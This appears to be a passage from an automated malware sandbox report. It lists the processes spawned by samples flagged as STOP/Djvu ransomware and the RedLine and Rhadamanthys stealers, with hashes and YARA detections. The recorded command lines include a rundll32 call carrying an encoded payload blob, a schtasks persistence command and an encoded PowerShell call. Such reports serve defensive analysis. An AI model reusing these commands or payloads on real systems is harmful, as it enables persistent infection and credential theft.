                                                                                                                                      Path:C:\Users\user\AppData\Local\Temp\2560.exe
                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                      Commandline:C:\Users\user\AppData\Local\Temp\2560.exe
                                                                                                                                      Imagebase:0x400000
                                                                                                                                      File size:718848 bytes
                                                                                                                                      MD5 hash:0A006808F7AA017CAF2DF9CE9E2B55A2
                                                                                                                                      Has elevated privileges:false
                                                                                                                                      Has administrator privileges:false
                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                      Yara matches:
                                                                                                                                      • Rule: JoeSecurity_Djvu, Description: Yara detected Djvu Ransomware, Source: 0000000F.00000002.362651886.0000000004A00000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                      • Rule: Windows_Ransomware_Stop_1e8d48ff, Description: unknown, Source: 0000000F.00000002.362651886.0000000004A00000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                                                      • Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 0000000F.00000002.361737434.0000000002EA1000.00000040.00000020.00020000.00000000.sdmp, Author: unknown
                                                                                                                                      Antivirus matches:
                                                                                                                                      • Detection: 100%, Joe Sandbox ML
                                                                                                                                      • Detection: 67%, ReversingLabs
                                                                                                                                      Reputation:moderate

                                                                                                                                      Target ID:16
                                                                                                                                      Start time:09:42:48
                                                                                                                                      Start date:25/01/2023
                                                                                                                                      Path:C:\Users\user\AppData\Local\Temp\226F.exe
                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                      Commandline:C:\Users\user\AppData\Local\Temp\226F.exe
                                                                                                                                      Imagebase:0xff0000
                                                                                                                                      File size:1642648 bytes
                                                                                                                                      MD5 hash:EA25CE2F3580AF1DD771BAC5B0D2BF83
                                                                                                                                      Has elevated privileges:false
                                                                                                                                      Has administrator privileges:false
                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                      Yara matches:
                                                                                                                                      • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000010.00000003.367401202.000000000D030000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                      • Rule: MALWARE_Win_RedLine, Description: Detects RedLine infostealer, Source: 00000010.00000003.367401202.000000000D030000.00000004.00001000.00020000.00000000.sdmp, Author: ditekSHen
                                                                                                                                      • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000010.00000003.469890360.00000000016EB000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                      • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000010.00000002.479891077.00000000016F2000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                      • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000010.00000003.369928370.000000000D032000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                      Antivirus matches:
                                                                                                                                      • Detection: 100%, Joe Sandbox ML
                                                                                                                                      • Detection: 43%, ReversingLabs
                                                                                                                                      • Detection: 39%, Virustotal, Browse
                                                                                                                                      Reputation:moderate

                                                                                                                                      Target ID:17
                                                                                                                                      Start time:09:42:48
                                                                                                                                      Start date:25/01/2023
                                                                                                                                      Path:C:\Users\user\AppData\Local\Temp\2560.exe
                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                      Commandline:C:\Users\user\AppData\Local\Temp\2560.exe
                                                                                                                                      Imagebase:0x400000
                                                                                                                                      File size:718848 bytes
                                                                                                                                      MD5 hash:0A006808F7AA017CAF2DF9CE9E2B55A2
                                                                                                                                      Has elevated privileges:false
                                                                                                                                      Has administrator privileges:false
                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                      Yara matches:
                                                                                                                                      • Rule: SUSP_XORed_URL_in_EXE, Description: Detects an XORed URL in an executable, Source: 00000011.00000002.363362004.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Florian Roth
                                                                                                                                      • Rule: JoeSecurity_Djvu, Description: Yara detected Djvu Ransomware, Source: 00000011.00000002.363362004.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                      • Rule: MALWARE_Win_STOP, Description: Detects STOP ransomware, Source: 00000011.00000002.363362004.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen
                                                                                                                                      • Rule: Windows_Ransomware_Stop_1e8d48ff, Description: unknown, Source: 00000011.00000002.363362004.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                                                                                                                      Reputation:moderate

                                                                                                                                      Target ID:18
                                                                                                                                      Start time:09:42:56
                                                                                                                                      Start date:25/01/2023
                                                                                                                                      Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exe
                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                      Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exe
                                                                                                                                      Imagebase:0xfc0000
                                                                                                                                      File size:85096 bytes
                                                                                                                                      MD5 hash:ED7F195F7121781CC3D380942765B57D
                                                                                                                                      Has elevated privileges:false
                                                                                                                                      Has administrator privileges:false
                                                                                                                                      Programmed in:.Net C# or VB.NET
                                                                                                                                      Yara matches:
                                                                                                                                      • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000012.00000002.460489461.000000000343F000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                      • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000012.00000002.460489461.000000000343F000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                      • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000012.00000002.456297712.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                      • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000012.00000002.460489461.00000000034F9000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                      Reputation:moderate

                                                                                                                                      Target ID:19
                                                                                                                                      Start time:09:42:58
                                                                                                                                      Start date:25/01/2023
                                                                                                                                      Path:C:\Windows\SysWOW64\fontview.exe
                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                      Commandline:C:\Windows\SYSWOW64\fontview.exe
                                                                                                                                      Imagebase:0xa60000
                                                                                                                                      File size:114176 bytes
                                                                                                                                      MD5 hash:218D53564FB0DD0CAFBBF871641E70F7
                                                                                                                                      Has elevated privileges:false
                                                                                                                                      Has administrator privileges:false
                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                      Yara matches:
                                                                                                                                      • Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000013.00000003.383001700.0000000003666000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                      • Rule: JoeSecurity_RHADAMANTHYS, Description: Yara detected RHADAMANTHYS Stealer, Source: 00000013.00000003.383001700.0000000003666000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                      • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 00000013.00000003.386704960.00000000053B1000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                      • Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000013.00000002.467467655.00000000035B0000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                      • Rule: JoeSecurity_RHADAMANTHYS, Description: Yara detected RHADAMANTHYS Stealer, Source: 00000013.00000002.467467655.00000000035B0000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                      • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 00000013.00000003.387503810.00000000055A0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                      Reputation:moderate

                                                                                                                                      Target ID:24
                                                                                                                                      Start time:09:43:39
                                                                                                                                      Start date:25/01/2023
                                                                                                                                      Path:C:\Windows\System32\rundll32.exe
                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                      Commandline: "C:\Users\user\AppData\Roaming\nsis_uns5aa2a3.dll",PrintUIEntry |5CQkOhmAAAA|1TKr5GsMwYD|67sDqg8OAAl|xYmwxC0TNSO|1k8B3tZkgiyf2sAZQByAG4XAP9sADMAMgAuAKVkHwBs8|AtBQPz8FP|AFoAeQBPAGL7AEEnAEMAaAA3|wBVAEsAZwBJ|i0CWUiD7CjoBP8CAABIg8Qow||MzMxMiUQkGP9IiVQkEEiJTPskCF0BSItEJDBvSIkEJIEBOEhvAL8ISMdEJBAtAet9DoEBEEiDwAGPAd0QgQFASDmWAHMl|p8DiwwkSAPISF+LwUiLTKsBVHsA|wPRSIvKigmI9wjrwWYFZUiLBPslYPPwM8lIi1D|GEg70XQ2SIP|wiBIiwJIO8L|dCpmg3hIGHX|GkyLQFBmQYPvOGt0BxERS3UI|hEQeBAudAVIi78A69VIi0j9AMH+agBAU1VWV0FUv0FVQVZBV10BZv+BOU1aTYv4TP+L8kiL2Q+F|P7z8ExjSTxBgTz|CVBFAAAPheq+8|BBi4QJiPPwhf|ASI08AQ+E1t5qEYO8CYwtAQ+E|cfz8ESLZyBEi|9fHIt3JESLT|8YTAPhTAPZSP8D8TPJRYXJD|uEpPPwTYvEQYv|EEUz0kgD04r|AoTAdB1BwcrvDQ++wPoAAUQD|dC|EXXsQYH6qv|8DXx0DoPBAf9Jg8AEQTvJc|9p68aLwQ+3DP9ORYssi0wD6+90WDPtqhB0UUH7ixTBANMzyYoCf0yLwusPwcnIEXsDyOUQAUGKANUQ|+0zwDP2QTsM+bbgEKYAg8YBg|j|CHLu6wpIi8v|Qf|VSYkE94P9xeQQxAQ7bxhy|a9mAUFfQV5BXb9BXF9eXVszF0jvgexgAWQAi+no|2b+||9IhcAPW4SYdSBMja8BiysQ38gz|+ibfSCNX|8ETI1FRjPSi9|L|1QkaIAgTIuv4A+Ea3UgRagQM|fAi9ORIEiJfCT1IKYgcIAgSIvwD|OES3UgpiBQSI1W|whEjUdASI2M|SSFEUiL2Oh8|a5+II1WSN4gEOIhzPbz8Ohn7yBEiwaN01cIQSCmIFjKIYmEaySAhxLe8|CLDtogj1iJjCRxEQcwkSDo7THvIIucLTJMi12|OkiD+2xIiiAw|0yJZCQ4TIuk7hoyTIlchAGEJNy2hxGGko0RjUdLMIz7JPDz8EmL1Ojp7fwFMIqceDJIjYT+eDJBgPMhjU9s90QwGKQCg+kBdffzgbx4MiFSZXi|dU2LhCT0IjGU+yT4NQHCSDvYcv84g|psdjNEjXtJQPoAlEG4AJgAeqYgQMoi+HQZRLYwvsAxSY1UJGyRIEnfg+hs6GuCMEiL|c6mIHhIhf90Es+LVUJMjjAbMUiN|0wkQP|XSIHEAHQhYSQtCC0B
                                                                                                                                      Imagebase:0x7ff6c5de0000
                                                                                                                                      File size:69632 bytes
                                                                                                                                      MD5 hash:73C519F050C20580F8A62C849D49215A
                                                                                                                                      Has elevated privileges:false
                                                                                                                                      Has administrator privileges:false
                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                      Yara matches:
                                                                                                                                      • Rule: JoeSecurity_RHADAMANTHYS, Description: Yara detected RHADAMANTHYS Stealer, Source: 00000018.00000003.635769063.000002275D541000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                      • Rule: JoeSecurity_RHADAMANTHYS, Description: Yara detected RHADAMANTHYS Stealer, Source: 00000018.00000003.517892986.000002275DAB3000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                      • Rule: JoeSecurity_RHADAMANTHYS, Description: Yara detected RHADAMANTHYS Stealer, Source: 00000018.00000003.465106371.000002275D66D000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                      • Rule: JoeSecurity_RHADAMANTHYS, Description: Yara detected RHADAMANTHYS Stealer, Source: 00000018.00000003.463672074.000002275D472000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                      • Rule: JoeSecurity_RHADAMANTHYS, Description: Yara detected RHADAMANTHYS Stealer, Source: 00000018.00000003.519715452.000002275DCB6000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                      • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 00000018.00000003.480168588.000002275D6F0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                      • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 00000018.00000003.478098878.000002275D46D000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security

                                                                                                                                      Target ID:25
                                                                                                                                      Start time:09:44:10
                                                                                                                                      Start date:25/01/2023
                                                                                                                                      Path:C:\Windows\System32\dllhost.exe
                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                      Commandline:C:\Windows\system32\dllhost.exe
                                                                                                                                      Imagebase:0x7ff769260000
                                                                                                                                      File size:20888 bytes
                                                                                                                                      MD5 hash:2528137C6745C4EADD87817A1909677E
                                                                                                                                      Has elevated privileges:false
                                                                                                                                      Has administrator privileges:false
                                                                                                                                      Programmed in:.Net C# or VB.NET
                                                                                                                                      Yara matches:
                                                                                                                                      • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 00000019.00000003.535647654.0000019D88EF0000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security

                                                                                                                                      Target ID:32
                                                                                                                                      Start time:09:44:32
                                                                                                                                      Start date:25/01/2023
                                                                                                                                      Path:C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                      Commandline:"C:\Windows\System32\schtasks.exe" /create /tn "svcupdater" /tr "C:\Users\user\AppData\Roaming\Win32Sync\svcupdater.exe" /st 00:00 /du 9999:59 /sc once /ri 1 /f
                                                                                                                                      Imagebase:0x8e0000
                                                                                                                                      File size:185856 bytes
                                                                                                                                      MD5 hash:15FF7D8324231381BAD48A052F85DF04
                                                                                                                                      Has elevated privileges:false
                                                                                                                                      Has administrator privileges:false
                                                                                                                                      Programmed in:C, C++ or other language

                                                                                                                                      Target ID:33
                                                                                                                                      Start time:09:44:33
                                                                                                                                      Start date:25/01/2023
                                                                                                                                      Path:C:\Windows\System32\conhost.exe
                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                      Imagebase:0x7ff745070000
                                                                                                                                      File size:625664 bytes
                                                                                                                                      MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                                                      Has elevated privileges:false
                                                                                                                                      Has administrator privileges:false
                                                                                                                                      Programmed in:C, C++ or other language

                                                                                                                                      Target ID:35
                                                                                                                                      Start time:09:44:46
                                                                                                                                      Start date:25/01/2023
                                                                                                                                      Path:C:\Users\user\AppData\Roaming\Win32Sync\svcupdater.exe
                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                      Commandline:C:\Users\user\AppData\Roaming\Win32Sync\svcupdater.exe
                                                                                                                                      Imagebase:0x400000
                                                                                                                                      File size:752246784 bytes
                                                                                                                                      MD5 hash:A4C9D357EA9C7679D978EB985F61E6C5
                                                                                                                                      Has elevated privileges:false
                                                                                                                                      Has administrator privileges:false
                                                                                                                                      Programmed in:C, C++ or other language

                                                                                                                                      Target ID:36
                                                                                                                                      Start time:09:44:48
                                                                                                                                      Start date:25/01/2023
                                                                                                                                      Path:C:\Users\user\AppData\Local\Temp\Library.exe
                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                      Commandline:"C:\Users\user\AppData\Local\Temp\Library.exe"
                                                                                                                                      Imagebase:0xa20000
                                                                                                                                      File size:3162624 bytes
                                                                                                                                      MD5 hash:EC5A11FC9A9CB3111AFA460FEC201D3D
                                                                                                                                      Has elevated privileges:false
                                                                                                                                      Has administrator privileges:false
                                                                                                                                      Programmed in:.Net C# or VB.NET
                                                                                                                                      Antivirus matches:
                                                                                                                                      • Detection: 100%, Avira
                                                                                                                                      • Detection: 100%, Joe Sandbox ML

                                                                                                                                      Target ID:40
                                                                                                                                      Start time:09:45:01
                                                                                                                                      Start date:25/01/2023
                                                                                                                                      Path:C:\Windows\System32\WerFault.exe
                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                      Commandline:C:\Windows\system32\WerFault.exe -u -p 5980 -s 648
                                                                                                                                      Imagebase:0x7ff679980000
                                                                                                                                      File size:494488 bytes
                                                                                                                                      MD5 hash:2AFFE478D86272288BBEF5A00BBEF6A0
                                                                                                                                      Has elevated privileges:false
                                                                                                                                      Has administrator privileges:false
                                                                                                                                      Programmed in:C, C++ or other language

                                                                                                                                      Target ID:41
                                                                                                                                      Start time:09:45:10
                                                                                                                                      Start date:25/01/2023
                                                                                                                                      Path:C:\Users\user\AppData\Roaming\Win32Sync\svcupdater.exe
                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                      Commandline:C:\Users\user\AppData\Roaming\Win32Sync\svcupdater.exe
                                                                                                                                      Imagebase:0x400000
                                                                                                                                      File size:752246784 bytes
                                                                                                                                      MD5 hash:A4C9D357EA9C7679D978EB985F61E6C5
                                                                                                                                      Has elevated privileges:false
                                                                                                                                      Has administrator privileges:false
                                                                                                                                      Programmed in:C, C++ or other language

                                                                                                                                      Target ID:42
                                                                                                                                      Start time:09:45:36
                                                                                                                                      Start date:25/01/2023
                                                                                                                                      Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                      Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ENC cwB0AGEAcgB0AC0AcwBsAGUAZQBwACAALQBzAGUAYwBvAG4AZABzACAAOQAwAA==
                                                                                                                                      Imagebase:0x7ff665920000
                                                                                                                                      File size:447488 bytes
                                                                                                                                      MD5 hash:95000560239032BC68B4C2FDFCDEF913
                                                                                                                                      Has elevated privileges:false
                                                                                                                                      Has administrator privileges:false
                                                                                                                                      Programmed in:.Net C# or VB.NET

                                                                                                                                      Target ID:43
                                                                                                                                      Start time:09:45:36
                                                                                                                                      Start date:25/01/2023
                                                                                                                                      Path:C:\Windows\System32\conhost.exe
                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                      Imagebase:0x7ff745070000
                                                                                                                                      File size:625664 bytes
                                                                                                                                      MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                                                      Has elevated privileges:false
                                                                                                                                      Has administrator privileges:false
                                                                                                                                      Programmed in:C, C++ or other language

                                                                                                                                      No disassembly